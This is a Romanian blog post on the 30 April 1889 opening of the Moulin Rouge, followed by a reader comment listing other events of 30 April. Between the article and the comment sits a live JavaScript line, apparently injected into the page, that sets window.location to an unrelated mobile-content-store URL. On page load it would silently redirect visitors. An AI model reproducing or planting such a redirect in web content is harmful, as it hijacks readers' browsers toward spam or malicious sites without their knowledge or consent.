Într-o zi de 30 aprilie…

…in anul 1889, se deschideau portile celei mai „zgomotoase” mori de vant din lume – Moulin Rouge.

Cabaretul Moulin Rouge a fost construit de catre Josep Oller, care la acea vreme detinea si Olympia, un alt local celebru din Paris. Pictat in rosu aprins, „bastionul” distractiei pariziene si unul dintre simbolurile Frantei, cabaretul amplasat in apropiere de Montmartre, in cartierul rosu al Parisului numit Pigalle, a revolutionat conceptul music-hall-ului prin spectacole impresionante. Moulin Rouge este celebru datorita faptului ca este considerat locul in care a luat nastere forma moderna a dansului can-can. Acest dans a existat cu mult inaintea cabaretului Moulin Rouge si era un dans al clasei muncitoare dar acesta a fost adaptat de catre curtezanele de la Moulin Rouge astfel incat sa incante clientela masculina a localului. Moulin Rouge este usor de localizat datorita celebrei mori de vant de culoare rosie pe care o are pe acoperis. De-a lungul timpului, pe lista numelor celebre care i-au calcat pragul figureaza artisti ca Josephine Baker, Frank Sinatra sau Edith Piaf, care au facut senzatie pe celebra scena a cabaretului Moulin Rouge. Astazi, Moulin Rouge este un obiectiv turistic de seama si ofera dans si divertisment clientilor sai din intreaga lume. Decorul din interiorul cabaretului pastreaza inca mult din romantismul Frantei de la inceputul secolului XX. Moulin Rouge a fost subiectul unor opere ale pictorului post-impresionist Toulouse-Lautrec si au existat mai multe filme cu numele cabaretului, printre care si cel din 2001 cu Ewan McGregor si Nicole Kidman care, la fel ca adaptarea din 1952, a fost nominalizat pentru categoria cel mai bun film la Oscar-uri.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

1 comment

 1. Mariana Stratulat

  Tot astazi:

  Tot intr-o zi de 30 aprilie, in 1789, americanii isi alegeau primul presedinte, pe George Washington. Pe terasa de la Federal Hall din Wall Street, la New York, George Washington depunea juramantul, devenind primul Presedinte al Statelor Unite. Chiar daca vremurile s-au schimbat, ziua de 30 aprilie a ramas pentru sefii de stat americani o zi a premierelor. In 1939, Franklin Roosevelt era primul presedinte care aparea la televizor, iar in 1995, pe 30 aprilie, Bill Clinton deschidea seria vizitelor in Irlanda de Nord.

  Pe 30 aprilie 1803, Statele Unite cumparau de la Franta teritoriul Louisiana in schimbul sumei de 80 milioane franci–aur.

  In 1896, pe 30 aprilie, romanii erau preocupati de educatie: era adoptata Legea invatamantului primar si normal–primar. Prin aceeasi reglementare se infiinta Casa Scoalelor, care va avea ca atributie administrarea fondurilor destinate construirii de scoli si achizitionarea mobilierului aferent.

  La data de 30 aprilie 1897, Mihail Sadoveanu debuta in ziarul umoristic “Dracul” din Bucuresti. Sub pseudonimul Mihai din Pascani, viitorul romancier publica schita umoristica de 40 de randuri sub titlul “Domnisoara N. din Falticeni”.

  Tot intr-o zi de 30 aprilie, in 1945, Adolf Hitler si Eva Braun se sinucideau.

  Pe 30 aprilie 1948 era creata Organizatia Statelor Americane (OSA), organizatie internationala guvernamentala cu sediul la Washington (membri: 35 de state si 24 de observatori permanenti; obiective: securitatea continentala; solutionarea pasnica a conflictelor dintre statele membre).

  In 1975, pe 30 aprilie, avea loc eliberarea totala a Vietnamului (Ziua Victoriei).

  La 30 aprilie 1977, cei de la Led Zeppelin doborau recordul mondial la numarul de spectatori care au participat la un concert. Trupa a cantat in fata a 76.229 de spectatori. Recordul anterior era detinut de trupa The Who, ce cantase in fata a 75.962 spectatori.

  Pe 30 aprilie 1988, la Dublin, in Irlanda, Celine Dion castiga cea de-a 33-a editie a Eurovision pentru Elvetia cu piesa “Ne partez pas sans moi”. Celine, in varsta de 20 de ani, era cea mai tanara castigatoare a acestui concurs. In aceeasi seara, Rene Angelil a trecut de la statutul de manager la acela de iubit, cand a sarutat-o pe Celine dupa spectacolul de la Dublin. De teama ca fanii vor considera diferenta de varsta dintre cei doi (26 de ani) necorespunzatoare, cuplul a pastrat relatia secreta mai multi ani. Cu toate acestea, nunta lor din 1994 in Bazilica Notre Dame din Montreal a fost sarbatorita nu numai de catre cei 250 de invitati, ci si de milioane de fani din lumea intreaga.

  In 1993, pe 30 aprilie, tenisul avea parte de cel mai infricosator si ciudat moment din istoria sa – jucatoarea iugoslava de tenis de camp, Monica Seles, numarul 1 mondial, era grav ranita de un suporter al lui Steffi Graf. Monica Seles a revenit pe teren dupa 27 de luni si a ajuns imediat in finala turneului US Open.
  Tot intr-o zi de 30 aprilie, in 1998, Ronan Keating se casatorea cu Yvonne Connolly.
  Pe 30 aprilie 2001, un avion in care calatorea Sting iesea de pe pista in momentul aterizarii, la Florence. Nicio persoana nu a fost ranita.

  In 2004, pe 30 aprilie, era observat SASSER, un «Computer worm», care in doar cateva zile a infectat o mare parte din computerele din lumea intreaga.

  La 30 aprilie 2004, Michael Jackson era din nou acuzat de abuz asupra copiilor.
  Pe 30 arpilie 2005, membrii trupei The Dave Matthews Band erau de acord sa plateasca 200.000 de dolari dupa ce autobuzul lor de turneu varsase resturi menajere pe un vapor plin cu turisti ce faceau un tur architectural al orasului Chicago.

  Astazi le spunem “La multi ani!” celor nascuti pe 30 aprilie, printre care se numara regizorul danez Lars von Trier, cantaretul american Akon si actrita Kirsten Dunst.

  Surse: en.wikipedia.org/wiki/Main_Page, http://www.440.com/twtd/today.html, http://www.thisdayinmusic.com/

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *